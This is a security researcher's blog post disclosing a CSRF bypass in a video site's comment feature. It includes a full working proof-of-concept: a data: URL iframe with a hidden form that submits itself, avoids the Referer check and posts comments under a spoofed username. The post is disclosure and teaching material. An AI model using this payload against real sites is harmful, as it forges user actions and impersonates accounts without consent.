@zseano
UK Security Researcher



A site containing various blog posts, tutorials, tools and information regarding working with me.

@zseano
UK Security Researcher



A site containing various blog posts, tutorials, tools and information regarding working with me.



Tutorials Blog Posts Tools Contact Information



CSRF 'protection' bypass on xvideos

Read more blogs on BugBountyForum


When commenting on a video on xvideos there’s 0 CSRF tokens sent. The request is:

POST http://www.xvideos.com/video-post-comment/video_id/ HTTP/1.1 user=testuser&comment=testy&test=ok

We can actually spoof user= to be whatever want. However.. xvideos check if the Referer: is xvideos.com, or blank. If it’s blank, it’ll let it through.

But how can we send a blank referer? This is where our trusty friend data: comes into play.

If you visit data:text/html, <script>top.location.href='http://www.google.com/';</script> on chrome, it’ll redirect with no referer and origin as null.

So let’s create an iframe with data: along with our form to submit a post. (replace video_here with videoid below).

<iframe src='data:text/html,<html> <head> <script> function doit() { document.getElementById("myForm").submit(); } setTimeout(doit,2000); </script> </head> <div style="display:none;"> <iframe id="myframe" name="myframe"></iframe> <form id="myForm" name="myForm" action="http://www.xvideos.com/video-post-comment/video_here/" method="POST" target="myframe"> <input type="text" name="user" value="testuser"></input> <input type="text" name="comment" value="testy"></input> <input type="text" name="test" value="ok"></input> </form>'></iframe>

The request:
image

The response:
image

Notice thanks to data:, the referer value isn’t there and Origin is “null”, so xvideos let it through. :)

Just checking Referer: is a bad approach to protecting from CSRF!